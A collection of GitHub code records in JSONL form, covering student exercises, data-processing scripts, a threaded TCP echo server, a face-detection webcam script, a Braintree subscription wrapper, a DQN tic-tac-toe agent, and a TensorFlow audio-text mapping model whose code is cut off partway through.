+{"seq_id":"70722339076","text":"# 3.2[18]: Find the element of a list of integers that is closest in value to a given number X.\n# The user enters this number from the keyboard; the list can be considered given. The entered number is not necessarily contained in the list.\n# If several numbers in the list are equally close to the given number X, output the first one encountered.\n# Examples/Tests:\n# Input: [10, 5, 7, 3, 3, 2, 5, 7, 3, 8], X = 0\n# Output: 2\n# Input: [10, 5, 7, 3, 3, 2, 5, 7, 3, 8], X = 9\n# Output: 10\n\nn = [10, 5, 7, 3, 3, 2, 5, 7, 3, 8]\nx = int(input('Enter number X: '))\ndef nearest_value(n, x):\n    found = n[0]  # the value found so far (initially the first element)\n    for item in n:\n        if abs(item - x) < abs(found - x):\n            found = item\n    return found\n\nprint(nearest_value(n, x))","repo_name":"AnastasiaGolo/Hometask","sub_path":"hometask3_2.py","file_name":"hometask3_2.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28230443247","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 22 10:39:47 2021\n\n@author: magnudry\n\"\"\"\n\nimport xarray as xr\nimport numpy as np\n\nzfile = \"/uio/lagringshotell/geofag/students/metos/magnudry/Master/Fra_PEI/creg12.l75/CREG12.L75-REF08_mesh_zgr.nc\"\nzgrid = xr.open_dataset(zfile)\ngrdthn = zgrid.isel(t = 0, x = slice(0,1580,10), y = slice(0,1801,10))\n\nufile = \"/uio/lagringshotell/geofag/students/metos/magnudry/Master/U_comp/CREG12.L75-REF08_y2000m01d05.5d_gridU.nc\"\nudata = xr.open_dataset(ufile)\nudatathn = udata.isel(time_counter = 0, x = slice(0,1580,10), y = slice(0,1801,10))\n#print(grdthn)\n#print(udatathn)\n\nudatathn = udatathn.assign(u_bot = udatathn[\"vozocrtx\"].isel(depthu = grdthn[\"mbathy\"]-1))\n\nprint(udatathn[\"u_bot\"].data[105,105] == 0)","repo_name":"magnudry/Master-deg","sub_path":"Test_funcs/karen_problem.py","file_name":"karen_problem.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"42898609812","text":"from setuptools import setup, find_packages\n\nSRC_DIR = 'src'\n\n\ndef get_version():\n    import sys\n\n    sys.path[:0] = [SRC_DIR]\n    return __import__('dancing_bear').__version__\n\n\nsetup(\n    name='dancing-bear',\n    version=get_version(),\n    description='Dancing Bear',\n    author='mogproject',\n    author_email='mogproj@gmail.com',\n    license='Apache 2.0 License',\n    url='https://github.com/mogproject/dancing-bear',\n    install_requires=[\n        'six',\n        'python-dateutil',\n        'pytz',\n        'tzlocal',\n        'argparse',\n        'pyserial',\n        'mog-commons >= 0.1.3',\n    ],\n    tests_require=[\n        'unittest2',\n    ],\n    package_dir={'': SRC_DIR},\n    packages=find_packages(SRC_DIR),\n    include_package_data=True,\n    test_suite='tests',\n    entry_points=\"\"\"\n    [console_scripts]\n    dancing-bear = dancing_bear.dancing_bear:main\n    \"\"\",\n)\n","repo_name":"mogproject/dancing-bear","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"30267679907","text":"import pandas as pd\n\nfrom parameters.data_path import DIR_EDF, DIR_INPUT, DIR_PROCESSED\nfrom utils.data_conversion import create_annoation_df\nfrom utils.kfold import create_folds\n\n\ndef main():\n    train_record_df = pd.read_csv(f\"{DIR_INPUT}/train_records.csv\")\n    train_record_df[\"hypnogram\"] = DIR_EDF + \"/\" + train_record_df[\"hypnogram\"]\n    train_record_df[\"psg\"] = DIR_EDF + \"/\" + train_record_df[\"psg\"]\n\n    test_record_df = pd.read_csv(f\"{DIR_INPUT}/test_records.csv\")\n    test_record_df[\"psg\"] = DIR_EDF + \"/\" + 
test_record_df[\"psg\"]\n\n train_df = create_annoation_df(train_record_df, is_test=False)\n train_df.to_csv(f\"{DIR_PROCESSED}/train_df0.csv\", index=False)\n # (161610, 4)\n test_df = create_annoation_df(test_record_df, is_test=True)\n test_df.to_csv(f\"{DIR_PROCESSED}/test_df0.csv\", index=False)\n # print(test_df.shape) # (52296, 4)\n\n train_df = pd.read_csv(f\"{DIR_PROCESSED}/train_df0.csv\")\n\n folds = create_folds(train_df)\n folds.to_csv(f\"{DIR_PROCESSED}/train_df_fold.csv\", index=False)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"masachika-kamada/sleep-stage-detection","sub_path":"create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30501322545","text":"# for val in \"codingDojo!\":\r\n# if val == \"o\":\r\n# continue\r\n# print (val)\r\n\r\n# # for val in \"string\":\r\n# # if val == \"i\":\r\n# # break\r\n# # print(val)\r\n# list = [3,5,1,2]\r\n# for i in list:\r\n# print(i)\r\n\r\n# list = [3,5,1,2]\r\n# for i in range(list):\r\n# print(i)\r\n\r\n\r\n# list = [3,5,1,2,5,6,7,6,4,3,2,3,342,23,4,23,4,23,42,7,4,5,5,4,56,45]\r\n# for i in range(len(list)):\r\n# print(i)\r\n\r\n\r\n# def biggie(arr)\r\n\r\nclass Case:\r\n def __init__(self,color,length,width,material):\r\n self.color = color\r\n self.length = length\r\n self.width = width\r\n self.material = material\r\n def drop(self):\r\n print(f\"hi my color is {self.color} and i am made out of {self.material}\")\r\n return self\r\n\r\n\r\n\r\ncase1 = Case(\"red\",\" \", \" \", \"nylon\")\r\ncase1.drop().drop().drop().drop().drop()","repo_name":"Anshuman2328/pyfunda","sub_path":"exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38445145408","text":"from nasa_fevo.Cache import Cache\nfrom nasa_fevo.RoverImagesRetriever import RoverImagesRetriever, \\\n DEFAULT_ROVER, DEFAULT_DAYS_TO_GET, DEFAULT_IMAGES_PER_DAY\n\nfrom urllib.parse import urlencode\nfrom datetime import date, timedelta, datetime\n# from nasa_fevo.HttpGetter import HttpGetter\nfrom nasa_fevo.HttpGetterWithCache import HttpGetterWithCache\n\n\nclass RoverImagesRetrieverWithCache(RoverImagesRetriever):\n def __init__(self, cache: Cache):\n http_getter_with_cache = HttpGetterWithCache(cache)\n super(RoverImagesRetrieverWithCache, self).__init__(http_getter_with_cache)\n self._cache: Cache = cache\n\n async def get_rover_images(self,\n rover: str = DEFAULT_ROVER,\n days_to_get: int = DEFAULT_DAYS_TO_GET,\n max_photos_per_day: int = DEFAULT_IMAGES_PER_DAY) -> str:\n\n today, url = self._make_pseudo_url_for_caching(days_to_get, max_photos_per_day, rover)\n\n resp = self._cache.get(url)\n if resp is not None:\n return resp\n else:\n resp = await super().get_rover_images(rover, days_to_get, max_photos_per_day)\n expires_next_day = datetime.combine(today+timedelta(days=1), datetime.min.time())\n self._cache.put(url, resp, expires_next_day)\n return resp\n\n def _make_pseudo_url_for_caching(self, days_to_get, max_photos_per_day, rover):\n today = date.today()\n params = {\n \"today\": today, \"rover\": rover, \"days_to_get\": days_to_get, \"max_photos_per_day\": max_photos_per_day\n }\n params = urlencode(params)\n url = f\"nasa_fevo://rover-images?{params}\"\n return today, 
url\n\n","repo_name":"lradomski10m/nasa-fevo","sub_path":"nasa_fevo/RoverImagesRetrieverWithCache.py","file_name":"RoverImagesRetrieverWithCache.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30827928829","text":"import torch\r\nimport random\r\nimport numpy as np\r\nfrom net import Net, Trainer\r\nfrom collections import deque\r\nimport torch.nn.functional as F\r\n\r\n\r\nMAX_MEMORY = 100_000\r\nBATCH_SIZE = 60\r\nLR = 0.01\r\nX = 1\r\nO = 2\r\n\r\n\r\nclass Q_Agent:\r\n def __init__(self, side):\r\n self.n_games = 0\r\n self.epsilon = 0.9999\r\n self.epsilon_decrease = 0.9997\r\n self.gamma = 0.99\r\n self.memory = deque(maxlen=MAX_MEMORY)\r\n self.q_net = Net()\r\n self.target_net = Net()\r\n self.trainer = Trainer(self.q_net, self.target_net, lr=LR, gamma=self.gamma)\r\n self.pieces = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])\r\n self.side = side\r\n self.action_log = []\r\n self.board_position_log = []\r\n\r\n def get_other(self):\r\n if self.side == X:\r\n return O\r\n elif self.side == O:\r\n return X\r\n\r\n def get_state(self, game):\r\n state = np.array([self.pieces.astype(int),\r\n (game.get_side(self.get_other())).astype(int),\r\n (game.get_empty()).astype(int)])\r\n state = state.reshape(3, 3, 3)\r\n state = np.transpose(state, [0, 1, 2])\r\n self.board_position_log.append(state.copy())\r\n return state\r\n\r\n def remember(self, reward):\r\n length = len(self.action_log)\r\n for i in range(length - 1):\r\n self.memory.append((self.board_position_log[i], self.action_log[i], 0, self.board_position_log[i + 1], False))\r\n\r\n self.memory.append((self.board_position_log[length - 1], self.action_log[length - 1], reward, np.array(([[0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0]], [[1, 1, 1], [1, 1, 1], [1, 1, 1]])), True))\r\n self.board_position_log = []\r\n self.action_log = []\r\n\r\n def train_long_memory(self):\r\n batch = random.sample(self.memory, BATCH_SIZE)\r\n states, actions, rewards, next_states, dones = zip(*batch)\r\n self.epsilon *= self.epsilon_decrease\r\n self.trainer.train_step(states, actions, rewards, next_states, dones)\r\n\r\n def train_short_memory(self, state, action, reward, next_state, done):\r\n self.trainer.train_step(state, action, reward, next_state, done)\r\n\r\n def get_action(self, state):\r\n self.epsilon = 0\r\n if self.n_games > 500:\r\n self.epsilon = 0.9999\r\n final_move = [0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n action = 0\r\n if random.random() > self.epsilon:\r\n r = random.randint(0, 2)\r\n c = random.randint(0, 2)\r\n while state[2, r, c] == 0:\r\n r = random.randint(0, 2)\r\n c = random.randint(0, 2)\r\n\r\n final_move[(3 * r) + c] = 1\r\n action = (3 * r) + c\r\n else:\r\n state0 = torch.tensor(state, dtype=torch.float)\r\n actions = self.q_net.forward(state0)\r\n actions = F.softmax(actions)\r\n\r\n while state[action] != 0:\r\n i = 0\r\n idx = None\r\n for e in actions:\r\n if e == torch.max(actions):\r\n idx = i\r\n i += 1\r\n\r\n actions[idx] = -1\r\n action = torch.argmax(actions).item()\r\n final_move[action] = 1\r\n\r\n self.action_log.append(action)\r\n return final_move\r\n","repo_name":"980073600/dqn-tic-tac-toe","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36060035384","text":"# -- coding: utf-8 --\n# @Time : 2022/7/27 17:03\n# @Author : Liu Hui\n# @Email : 
1073811240@qq.com\n# @File : 09-并发TCP服务器.py\n# @Software: PyCharm\n\nimport socket\nimport threading\n\nclass HandleData(threading.Thread):\n    def __init__(self, client_socket):\n        super(HandleData, self).__init__()\n        self.client_socket = client_socket\n\n    def run(self):\n        # 5. Receive/send data\n        while True:\n            recv_content = self.client_socket.recv(1024)\n            if len(recv_content) != 0:\n                print(recv_content)\n                self.client_socket.send(recv_content)\n            else:\n                self.client_socket.close()\n                break\n\n\nclass TCPServer(threading.Thread):\n    def __init__(self, port):\n        super(TCPServer, self).__init__()\n        # 1. Create the socket\n        self.server_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n        # 2. Bind local address info and set the port number\n        self.server_s.bind((\"\", port))\n\n        # 3. Switch the socket from the default active mode to passive (listening) mode\n        self.server_s.listen(128)\n\n    def run(self):\n\n        while True:\n            # 4. Wait for clients to connect\n            new_s, client_info = self.server_s.accept()  # the server accepts connections from multiple clients\n            print(client_info)  # ('192.168.133.1', 63889)\n\n            # create a new thread dedicated to serving the client that just connected\n            handle_data_thread = HandleData(new_s)\n            handle_data_thread.start()\n\n    def __del__(self):\n        # 6. Close the socket\n        self.server_s.close()\n\n\ntcp_server = TCPServer(7890)\ntcp_server.start()\n","repo_name":"liu1073811240/Multithreading","sub_path":"01-多线程/09-并发TCP服务器.py","file_name":"09-并发TCP服务器.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"18324214408","text":"#!/usr/bin/env python\n\nimport cv2\nimport sys\n\n\ndef main():\n    cascadePath = sys.argv[1]\n    faceCascade = cv2.CascadeClassifier(cascadePath)\n\n    webcam = cv2.VideoCapture(0)\n\n    while True:\n        ret, frame = webcam.read()\n        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n\n        faces = faceCascade.detectMultiScale(\n                                             gray,\n                                             1.1,\n                                             5,\n                                             minSize=(30, 30)\n        )\n\n        for (x, y, w, h) in faces:\n            cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n        cv2.imshow(\"Webcam\", frame)\n\n        if cv2.waitKey(1) & 0xFF == ord('q'):\n            break\n\n    webcam.release()\n    cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"JasonHarrer/PythonFun_FacialRec","sub_path":"recognize_webcam.py","file_name":"recognize_webcam.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23585305641","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 15 09:53:08 2017\n\n@author: marshi\n\"\"\"\n\nimport numpy as np\n\ndef max_syrup(r,h,k,n):\n    r = np.array(r)\n    h = np.array(h)\n    \n    sort = r.argsort()[::-1]\n    \n    r,h = r[sort],h[sort]\n    space = np.array([2*np.pi*r_*h_ for r_,h_ in zip(r,h)])\n    candidate = []\n    for start in range(k-n+1):\n        up_space = np.pi*r[start]*r[start]\n        if n > 1:\n            side_space = space[start]+sum(sorted(space[start+1:])[-(n-1):])\n        else:\n            side_space = space[start]\n        candidate.append(up_space+side_space)\n    \n    return max(candidate)\n\n\nif 0:\n    #t = int(input())\n    \n    k,n = 1000,1000\n    \n    r = np.random.randint(100, size=1000)\n    h = np.random.randint(100, size=1000)\n    print(max_syrup(r,h,k,n))\nelse:\n    t = int(input())\n    for i in range(t):\n        k,n = map(int, input().split(' '))\n        r,h = [],[]\n        for _ in range(k):\n            r_,h_ = map(int, input().split(' '))\n            r.append(r_)\n            h.append(h_)\n        print(\"Case #%d: %.9f\" % (i+1, max_syrup(r,h,k,n)))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_209/146.py","file_name":"146.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16621971649","text":"import numpy as np\r\nimport math\r\n\r\nmap_path = \"maps.npy\"\r\nmap_global_scale = 0.9\r\nmaps = np.load(map_path, allow_pickle=True)\r\nmap_amount = maps.shape[0]\r\n\r\ndef get_min_max(map):\r\n    #Get x,y-coordinates\r\n    map_coords = map.reshape((-1, 2))\r\n\r\n    #Get minimum x,y coordinates\r\n    return np.min(map_coords, axis=0), np.max(map_coords, axis=0)\r\n\r\n\r\ndef get_map(id, direction, width, height):\r\n    #Retrieve map from cache\r\n    map = maps[id]\r\n    map = np.array([map[0], map[1]])[:, ::-1 if direction else 1]\r\n\r\n    #Get smallest dimension of playground\r\n    if width < height:\r\n        map_coords_index = 0\r\n        map_scaler = width\r\n    else:\r\n        map_coords_index = 1\r\n        map_scaler = height\r\n\r\n\r\n    #Get map limits\r\n    (map_min, map_max) = get_min_max(map)\r\n    min = map_min[map_coords_index]\r\n    max = map_max[map_coords_index]\r\n    \r\n    #Normalize map\r\n    nrm_map = (map - min) / (max - min)\r\n    #Scale map\r\n    scaled_map = nrm_map * map_scaler * map_global_scale\r\n    \r\n    #Get scaled map limits\r\n    (map_min, map_max) = get_min_max(scaled_map)\r\n    \r\n    #Calculate centering offset\r\n    map_offset = np.array([width, height]) / 2\r\n    map_offset += -map_min - (map_max - map_min) / 2\r\n    \r\n    #Offset map\r\n    scaled_map += map_offset.reshape(1, 1, 2)\r\n\r\n    #Return map\r\n    return scaled_map\r\n","repo_name":"sarphiv/dtu-intro-ai-exam-project","sub_path":"environment/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"24114670683","text":"import logging\nfrom braintree import Subscription\nfrom braintree.exceptions import NotFoundError\n\nfrom almanac.exc.exceptions import IntegrationException\n\n\nclass BraintreeSubscription(object):\n    \"\"\"\n    Handles third-party integrations concerning subscriptions for the braintree\n    payment platform.\n    \"\"\"\n\n    def start_subscription(self, unique_id, payment_method_token, plan_id):\n        \"\"\"\n        Handles starting a subscription for the provided plan.\n\n        :param str unique_id: A unique UUID associated with the subscription.\n        :param str payment_method_token: The payment method token which is\n            created during customer creation.\n        :param str plan_id: The plan we want the user to subscribe under\n        :return: The result from starting the subscription\n        \"\"\"\n        result = Subscription.create({\n            'id': unique_id,\n            'payment_method_token': payment_method_token,\n            'plan_id': plan_id,\n        })\n\n        if not result.is_success:\n            logging.error(\n                'Failed to start subscription for payment method %s '\n                'with a plan ID of %s',\n                payment_method_token,\n                plan_id,\n            )\n            raise IntegrationException('Failed to start subscription.')\n\n        return result\n\n    def stop_subscription(self, subscription_id):\n        \"\"\"\n        Handles cancelling a subscription.\n\n        :param str subscription_id: The unique subscription ID created when the\n            subscription was started.\n        :return: The result of stopping the subscription.\n        \"\"\"\n        try:\n            result = Subscription.cancel(subscription_id)\n        except NotFoundError:\n            logging.error('Subscription ID %s not found.', subscription_id)\n            raise IntegrationException(\n                'Failed to cancel subscription. 
'\n 'Please contact ian@ianleeclark.com'\n )\n\n if not result.is_success:\n logging.error(\n 'Failed to cancel subscription by ID'\n )\n raise IntegrationException(\n 'Failed to cancel subscription. '\n 'Please contact ian@ianleeclark.com'\n )\n\n return result\n","repo_name":"Ianleeclark/providebooking-backend","sub_path":"almanac/integrations/braintree/subscriptions.py","file_name":"subscriptions.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73149259395","text":"#!/usr/bin/env python3\n\nimport tensorflow as tf\nimport numpy as np\nimport logging\nimport math\nimport pickle as pkl\nLOGGER = logging.getLogger(__name__)\n\n\nclass audio2text_ICP(object):\n AUDIO_HOLDER = 'audio_holder'\n TEXT_HOLDER = 'text_holder'\n LR_HOLDER = 'lr_holder'\n\n def __init__(\n self,\n audio_dim: int,\n text_dim: int,\n batch_size: int,\n penalty_lambda: float,\n logger=LOGGER,\n ):\n self.audio_dim = audio_dim\n self.text_dim = text_dim\n self.graph = tf.Graph()\n self.batch_size = batch_size\n self.penalty_lambda = penalty_lambda\n self.logger = logger\n # assert audio_k_way == text_n_vocab\n assert audio_dim == text_dim\n self.dim = audio_dim\n with self.graph.as_default():\n self._build_graph()\n self.config = tf.ConfigProto(log_device_placement=False)\n self.config.gpu_options.allow_growth = True\n self.sess = tf.Session(graph=self.graph, config=self.config)\n self.sess.run(tf.variables_initializer(\n var_list=self.graph.get_collection('variables')))\n self.saver = tf.train.Saver(\n var_list=self.graph.get_collection('variables'),\n max_to_keep=None)\n\n def _build_input_graph(self):\n self.t2a_text_holder = tf.placeholder(\n tf.float32,\n [None, self.dim],\n name='t2a_'+self.TEXT_HOLDER,\n )\n self.t2a_audio_holder = tf.placeholder(\n tf.float32,\n [None, self.dim],\n name='t2a_'+self.AUDIO_HOLDER,\n )\n self.a2t_audio_holder = tf.placeholder(\n tf.float32,\n [None, self.dim],\n name='a2t_'+self.AUDIO_HOLDER,\n )\n self.a2t_text_holder = tf.placeholder(\n tf.float32,\n [None, self.dim],\n name='a2t_'+self.TEXT_HOLDER,\n )\n self.lr = tf.placeholder(\n tf.float32,\n [],\n name=self.LR_HOLDER,\n )\n return\n\n def _build_Mb_graph(self):\n self.M_text2audio = tf.Variable(tf.eye(self.dim), name='t2a_matrix')\n self.b_text2audio = tf.Variable(\n tf.random_normal([self.dim]),\n name='t2a_bias',\n )\n self.M_audio2text = tf.Variable(tf.eye(self.dim), name='a2t_matrix')\n self.b_audio2text = tf.Variable(\n tf.random_normal([self.dim]),\n name='a2t_bias',\n )\n return\n\n def _build_Loss(self, y_hat, xy_hat, x_hat, yx_hat):\n t2a_loss = tf.losses.mean_squared_error(\n labels=self.t2a_audio_holder,\n predictions=y_hat,\n )\n tf.identity(t2a_loss, name='t2a_loss')\n\n a2t_loss = tf.losses.mean_squared_error(\n labels=self.a2t_text_holder,\n predictions=x_hat,\n )\n tf.identity(a2t_loss, name='a2t_loss')\n t2a2t_loss = tf.losses.mean_squared_error(\n labels=self.t2a_text_holder,\n predictions=xy_hat,\n weights=self.penalty_lambda,\n )\n tf.identity(t2a2t_loss, name='t2a2t_loss')\n a2t2a_loss = tf.losses.mean_squared_error(\n labels=self.a2t_audio_holder,\n predictions=yx_hat,\n weights=self.penalty_lambda,\n )\n tf.identity(a2t2a_loss, name='a2t2a_loss')\n all_loss = tf.identity(\n t2a_loss + a2t_loss + t2a2t_loss + a2t2a_loss,\n name='all_loss')\n return all_loss\n\n def _build_graph(self):\n # None stands for the batch size\n self._build_input_graph()\n self._build_Mb_graph()\n y_hat, xy_hat = 
self.t2a_trans(\n self.t2a_text_holder, self.t2a_audio_holder)\n x_hat, yx_hat = self.a2t_trans(\n self.a2t_audio_holder, self.a2t_text_holder)\n \n self.f1score = self.getFscore(1, self.a2t_text_holder, x_hat, 'f1score')\n self.f10score = self.getFscore(10, self.a2t_text_holder, x_hat, 'f10score')\n \n all_loss = self._build_Loss(y_hat, xy_hat, x_hat, yx_hat)\n # self.train_op = tf.train.GradientDescentOptimizer(self.lr).minimize(\n self.train_op = tf.train.AdamOptimizer(self.lr).minimize(\n all_loss,\n var_list=[self.M_text2audio, self.M_audio2text, self.b_audio2text,\n self.b_text2audio],\n name='train_op')\n return\n\n def findNN(self, y, y_hat):\n '''\n Args:\n y: the source to be compared\n y_hat: the target comparing\n Returns:\n inds: the indices of the result y hat\n '''\n # using the x_hat to find the nearest neighbour\n\n\n return\n\n def findKNN(self, y, y_hat, k):\n '''\n Args:\n y: the source to be compared\n y_hat: the target comparing\n Returns:\n y_ave: the average over the kNN\n '''\n return\n # Wx @ X + by = Y_hat, Wy @ y_hat + bx = X_hat_hat\n\n\n def t2a_trans(self, X, Y):\n '''\n Args:\n x should be the text embedding\n y should be the audio embedding\n '''\n y_hat_tmp = tf.matmul(\n self.M_text2audio,\n tf.transpose(X))\n y_hat_tmp = tf.transpose(y_hat_tmp)\n y_hat_tmp = tf.add(y_hat_tmp, self.b_text2audio)\n # y_hat_tmp = tf.nn.sigmoid(y_hat_tmp)\n y_hat = tf.identity(y_hat_tmp, name='audio_hat')\n\n xy_hat_tmp = tf.matmul(\n self.M_audio2text,\n tf.transpose(y_hat_tmp))\n xy_hat_tmp = tf.transpose(xy_hat_tmp)\n xy_hat_tmp = tf.add(xy_hat_tmp, self.b_audio2text)\n # xy_hat_tmp = tf.nn.sigmoid(xy_hat_tmp)\n xy_hat = tf.identity(xy_hat_tmp, name='text_hat_hat')\n\n return y_hat, xy_hat\n\n # Wy @ Y = X_hat, Wx @ X_hat = Y_hat_hat\n def a2t_trans(self, Y, X):\n '''\n Args:\n x should be the text embedding\n y should be the audio embedding\n '''\n x_hat_tmp = tf.matmul(\n self.M_audio2text,\n tf.transpose(Y))\n x_hat_tmp = tf.transpose(x_hat_tmp)\n x_hat_tmp = x_hat_tmp + self.b_audio2text\n # x_hat_tmp = tf.nn.sigmoid(x_hat_tmp)\n x_hat = tf.identity(x_hat_tmp, name='text_hat')\n\n yx_hat_tmp = tf.matmul(\n self.M_text2audio,\n tf.transpose(x_hat_tmp))\n yx_hat_tmp = tf.transpose(yx_hat_tmp)\n yx_hat_tmp = yx_hat_tmp + self.b_text2audio\n # yx_hat_tmp = tf.nn.sigmoid(yx_hat_tmp)\n yx_hat = tf.identity(yx_hat_tmp, name='audio_hat_hat')\n return x_hat, yx_hat\n\n def gen_batch(self):\n order_t2a = np.arange(self.text_embeds.shape[0])\n np.random.shuffle(order_t2a)\n order_a2t = np.arange(self.audio_embeds.shape[0])\n np.random.shuffle(order_a2t)\n self.t2a_text = self.text_embeds[order_t2a]\n self.t2a_audio = self.audio_embeds[order_t2a]\n self.a2t_text = self.text_embeds[order_a2t]\n self.a2t_audio = self.audio_embeds[order_a2t]\n cnt = 0\n num = math.ceil(float(self.text_embeds.shape[0]) / self.batch_size)\n while True:\n if cnt == num:\n self.new_epoch = True\n cnt = 0\n order_t2a = np.arange(self.text_embeds.shape[0])\n np.random.shuffle(order_t2a)\n order_a2t = np.arange(self.audio_embeds.shape[0])\n np.random.shuffle(order_a2t)\n self.t2a_text = self.text_embeds[order_t2a]\n self.t2a_audio = self.audio_embeds[order_t2a]\n self.a2t_text = self.text_embeds[order_a2t]\n self.a2t_audio = self.audio_embeds[order_a2t]\n start = cnt * self.batch_size\n end = start + self.batch_size\n ret = (\n self.t2a_text[start:end],\n self.t2a_audio[start:end],\n self.a2t_audio[start:end],\n self.a2t_text[start:end],\n )\n yield ret\n cnt += 1\n self.new_epoch = False\n\n def 
setTextAudio(self, t2a_text, t2a_audio, a2t_audio, a2t_text):\n self.text_embeds = t2a_text\n self.audio_embeds = a2t_audio\n self.t2a_audio = t2a_audio\n self.t2a_text = t2a_text\n self.a2t_audio = a2t_audio\n self.a2t_text = a2t_text\n return\n\n def getFscore(self, top_N, emb1, emb2, scope='Fscore'):\n # Trying to use tensorflow top k function to build\n with tf.variable_scope(scope):\n norm1 = tf.nn.l2_normalize(emb1, axis=1)\n shape = tf.shape(norm1)\n re_norm1 = tf.reshape(norm1, shape=(shape[0], 1, shape[1]))\n norm2 = tf.nn.l2_normalize(emb2, axis=1)\n # needs broadcast\n cos_sim = tf.reduce_sum(tf.multiply(re_norm1, norm2), axis=2)\n # shape should be (num, num)\n # _, indices = tf.nn.top_k(cos_sim, k=top_N)\n targets = tf.range(shape[0])\n top_Ks = tf.nn.in_top_k(cos_sim, targets, top_N)\n f_score = tf.reduce_mean(tf.cast(top_Ks, tf.float32))\n return f_score\n\n def getInputTensors(self):\n t2a_text_place = self.graph.get_tensor_by_name(\n 't2a_'+self.TEXT_HOLDER+':0')\n t2a_audio_place = self.graph.get_tensor_by_name(\n 't2a_'+self.AUDIO_HOLDER + ':0')\n a2t_text_place = self.graph.get_tensor_by_name(\n 'a2t_'+self.TEXT_HOLDER+':0')\n a2t_audio_place = self.graph.get_tensor_by_name(\n 'a2t_'+self.AUDIO_HOLDER+':0')\n return t2a_text_place, t2a_audio_place, a2t_audio_place, a2t_text_place\n\n def getFscoreOps(self):\n return self.f1score, self.f10score\n\n def trainOracle(\n self,\n lr = 0.1,\n epoch = 1000,\n decay_factor = 0.95,\n ):\n t2a_text_place, t2a_audio_place, a2t_audio_place, a2t_text_place = self.getInputTensors()\n lr_place = self.graph.get_tensor_by_name(self.LR_HOLDER + ':0')\n\n t2a_loss_tensor = self.graph.get_tensor_by_name(\n 't2a_loss:0')\n a2t_loss_tensor = self.graph.get_tensor_by_name(\n 'a2t_loss:0')\n t2a2t_loss_tensor = self.graph.get_tensor_by_name(\n 't2a2t_loss:0')\n a2t2a_loss_tensor = self.graph.get_tensor_by_name(\n 'a2t2a_loss:0')\n all_loss = self.graph.get_tensor_by_name(\n 'all_loss:0')\n train_op = self.graph.get_operation_by_name('train_op')\n batch_iter = self.gen_batch()\n loss = 0.\n self.new_epoch = False\n for epoch_num in range(epoch):\n while not self.new_epoch:\n t2a_text, t2a_audio, a2t_audio, a2t_text = next(batch_iter)\n _, loss, t2a_loss, a2t_loss, t2a2t_loss, a2t2a_loss = self.sess.run(# noqa\n [\n train_op,\n all_loss,\n t2a_loss_tensor,\n a2t_loss_tensor,\n t2a2t_loss_tensor,\n a2t2a_loss_tensor,\n ],\n feed_dict={\n t2a_text_place: t2a_text,\n t2a_audio_place: t2a_audio,\n a2t_audio_place: a2t_audio,\n a2t_text_place: a2t_text,\n lr_place: lr,\n })\n self.new_epoch = False\n self.logger.info('Epoch {}, loss:{}'.format(\n epoch_num,\n loss,\n ))\n loss_str = 'Epoch {}, loss: {}, t2a:{}, a2t:{}, t2a2t:{}, a2t2a:{} lr:{}'\n # print(loss_str.format(epoch_num, loss, t2a_loss, a2t_loss, t2a2t_loss,\n # a2t2a_loss, lr))\n if (epoch_num+1) % 100 == 0:\n lr *= decay_factor\n if (epoch_num+1) % 1000 == 0:\n f1_score, f10_score = self.calcFscore(self.text_embeds, self.audio_embeds)\n print('F1 Score:{}, F10 Score:{}'.format(f1_score, f10_score))\n return (loss, t2a_loss, a2t_loss, t2a2t_loss, a2t2a_loss)\n\n def trainUnsupersiced(\n self,\n lr = 0.1,\n epoch = 1000,\n decay_factor = 0.95,\n ):\n t2a_text_place, t2a_audio_place, a2t_audio_place, a2t_text_place = self.getInputTensors()\n lr_place = self.graph.get_tensor_by_name(self.LR_HOLDER + ':0')\n\n t2a_loss_tensor = self.graph.get_tensor_by_name(\n 't2a_loss:0')\n a2t_loss_tensor = self.graph.get_tensor_by_name(\n 'a2t_loss:0')\n t2a2t_loss_tensor = self.graph.get_tensor_by_name(\n 